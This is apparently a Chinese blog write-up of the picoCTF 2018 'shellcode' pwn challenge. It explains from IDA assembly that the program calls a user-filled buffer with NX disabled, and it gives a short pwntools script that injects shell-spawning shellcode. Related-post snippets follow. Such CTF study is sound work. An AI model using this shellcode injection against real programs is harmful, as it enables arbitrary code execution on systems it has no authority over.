picoctf_2018_shellcode 1

于 2024-03-25 15:55:19 发布
阅读量287 收藏 4
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74861133/article/details/137016426
版权

1.checksec

在这里插入图片描述

2.ida

在这里插入图片描述
发现main函数不能编译,只能看汇编了,在main中还调用了vuln函数,然后我们查看一下可疑的vuln函数
在这里插入图片描述
然后我们就要知道参数a1是从哪传进来的,回到main函数vuln处
在这里插入图片描述
发现参数a1应是ebp+var_A0处的内容,也就是我们会在这个位置写入任意东西。
再往后看
在这里插入图片描述
发现它会直接call这个位置,而且该程序没有开NX,故我们可以直接发送shellcode,这样程序就会直接执行shellcode从而拿到shell

3.exp

from pwn import*
p=process('./30')#远程记得用remote()
context(os = 'linux',arch = 'i386',log_level = 'debug')
shellcode=asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive()
曾经满眼皆是她
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
picoctf_2018_shellcode
z1r0的博客
12-29 1001
picoctf_2018_shellcode 查看保护 主函数不可以直接反汇编,错在call eax这里,eax拿的是ebp+var_A0这里对应的地址。发现在call vuln上面也将eax给赋了ebp+var_A0这里的地址。进vuln看一下 可以看到vuln函数中call了gets,可以写入ebp+arg_0这里的地址。而ebp+arg_0对应是地址则是main函数中ebp+var_A0中的地址。最后会call这个地址。所以写入shellcode,最后程序会自动call这里的shellcode
[buuctf]PicoCTF_2018_shellcode
逆向萌新的博客
07-17 415
[buuctf]PicoCTF_2018_shellcode,这道题主要是考你的shellcode编写能力和使用能力,或者是利用pwntools自动生成的shellcode进行利用
[BUUCTF]PWN——picoctf_2018_shellcode
mcmuyanga的博客
01-23 567
picoctf_2018_shellcode 附件 步骤 虽然题目都叫shellcode了,肯定没有开什么保护,但还是例行检查,32位程序 本地试运行一下,看看大概的情况 32位ida打开,没法f5,只能看汇编了,汇编太长就不截图了,做题做多了,直接看vlun,一般这个函数都有漏洞 看到vlun里调用了gets,参数是ebp+arg_0,结合main函数我们可以看到,gets 函数写入的地址即为 [ebp+var_A0] 对应的地址 然后在main函数里又发现,我们gets写入的地址,下
[BUUCTF-pwn]——picoctf_2018_shellcode
Y_peak的博客
02-24 364
[BUUCTF-pwn]——picoctf_2018_shellcode 题目地址:https://buuoj.cn/challenges#picoctf_2018_shellcode 论学好汇编的重要性。在这道题得到了体现。 第一次面向汇编, 说实话看的挺慢的。 话不多说 直接上 checksec看下 IDA中没法发反汇编,只能面向汇编编程。无法反汇编是call eax的问题,但是这个指令应该没有错,只能说这个时间eax存储着一个函数地址。也就是[ebp+var_A0]偏移处的函数。 我们可以发现
pe_to_shellcode:将PE转换为Shellcode
05-09
pe_to_shellcode 转换PE,以便可以像普通shellcode一样将其注入。 (同时,输出文件仍然是有效的PE)。 同时支持32位和64位PE 作者: 和 客观的 该项目的目标是提供一种生成PE文件的可能性,该文件可以轻松完成...
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
09-20
1. **选择目标**:确定要运行的系统(这里是Linux x86)和目标行为,比如打开一个网络连接、执行命令等。 2. **编写汇编代码**:使用汇编语言编写实现所需功能的代码,避免使用可能导致崩溃或被安全机制检测的指令。...
pe_to_shellcode_linux:PE到shellcode会将任何Windows非.dot net 64位EXE文件转换为shellcode。 这基于hasherezade的Windows pe_to_shellcode(https:github.comhasherezadepe_to_shellcode
02-13
pe_to_shellcode_linux PE到shellcode会将任何Windows非.dot net 64位EXE文件转换为shellcode。 这基于hasherezade的Windows pe_to_shellcode( )。 Hashrezade的HLDR64文件源 下载和构建: 在终端中,通过git...
Android系统shellcode编写.zip_android_shellcode
09-23
1. **权限限制**:Android系统采用了安全模型,如Linux的用户权限和SELinux,使得在非root环境下执行shellcode变得更加困难。攻击者需要找到绕过这些限制的方法,例如利用系统漏洞提升权限。 2. **内存布局**:与PC...
CDL_shellcode_源码
10-02
1. 分析:解析Java代码或用户输入的指令,以理解要执行的功能。 2. 转换:将这些指令转换成JavaScript兼容的语法,这可能涉及到对原始代码进行重写,因为JavaScript和Java在语法和运行时模型上有显著差异。 3. 优化...
BUUCTF刷题4
m0_51251108的博客
10-30 328
题目:hitcon2014_stkof:pwnable_hacknote:ciscn_2019_s_9:picoctf_2018_shellcode:npuctf_2020_easyheap:cmcc_pwnme2:x_ctf_b0verfl0w:picoctf_2018_leak_me:suctf_2018_basic pwn:cmcc_pwnme1: hitcon2014_stkof: 参考师傅:(4条消息) 好好说话之unlink_hollk’s blog-CSDN博客_好好说话之unlink 利用方
[BUUCTF]PWN——picoctf_2018_rop chain
mcmuyanga的博客
11-04 990
picoctf_2018_rop chain 附件 步骤: 例行检查,32位,开启了NX保护 试运行一下程序,看到输入太长数据会崩溃 32位ida载入,习惯性的检索程序里的字符串,看见了flag.txt,双击跟进 看到程序将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 从main函数开始看程序 vuln()函数 gets函数输入,没有限制读入长度,存在溢出漏洞,覆盖ret为flag函数地址,之后想
[BUUCTF-pwn]——picoctf_2018_can_you_gets_me
Y_peak的博客
02-24 388
[BUUCTF-pwn]——picoctf_2018_can_you_gets_me 题目地址:https://buuoj.cn/challenges#picoctf_2018_can_you_gets_me 通过这道题又学到了一个知识点。ROPgadget构造rop链 还是先checksec一下 在IDA中,查看一下。有gets栈溢出,又有puts函数。想当然的我们想到,通过puts函数,leek出一个got表地址,找到libc的栈基址,进而找到system函数和’/bin/sh’ 尝试过后你会
PicoCTF-2019-WirteUp
Zichel77的博客
11-25 1397
1. 2Warm-General Skills 直接将十进制转化为二进制 picoCTF{101010} 2. Insp3ct0r-Web Exploitation https://2019shell1.picoctf.com/problem/63975/ 点击链接看到如下页面 点击What没有变化,点击How出现如下页面 说明是分别从HTML,CS...
非常规情况下栈溢出系统调用——PicoCTF_2018_can-you-gets-me
PLpa的博客
08-04 489
前言: 对于这种非常规的栈溢出题目,我自己也是见的比较少,故写此博客记录一下。 解题思路 查看保护 只开了NX保护的32位程序,如果是常规题的话,应该是非常容易做的。 进入IDA查看伪代码 打开IDA,如果是第一次见这种题目就会傻眼了。 题目中的每一个函数都好像是自己写的,那么我们就不能利用got表来泄露函数地址来getshell了。 题目开了NX保护,我们不能写shellcode,常规的ROP又利用不了,我们就完全利用不了libc里边的函数了。 乍一看,好像没什么办法了,但是我们可以用程序中非常多的g
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8375
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
财务报表,项目费用支出明细.xlsx
08-09
工资表,财务报表,对账表,付款申请,财务报告,费用支出表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
ppap-第四版.pdf
08-09
ppap-第四版
铁路转辙机 ZD6 使用说明书
最新发布
08-09
铁路转辙机 ZD6 使用说明书
others_shellcode
07-28
others_shellcode是一种外部的、已编写好的机器码程序,在计算机系统中用于执行恶意行为,例如攻击、病毒、木马等。它可以被黑客选用,注入到受害者主机的内存中,并被执行。由于others_shellcode本身就是已经准备好...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值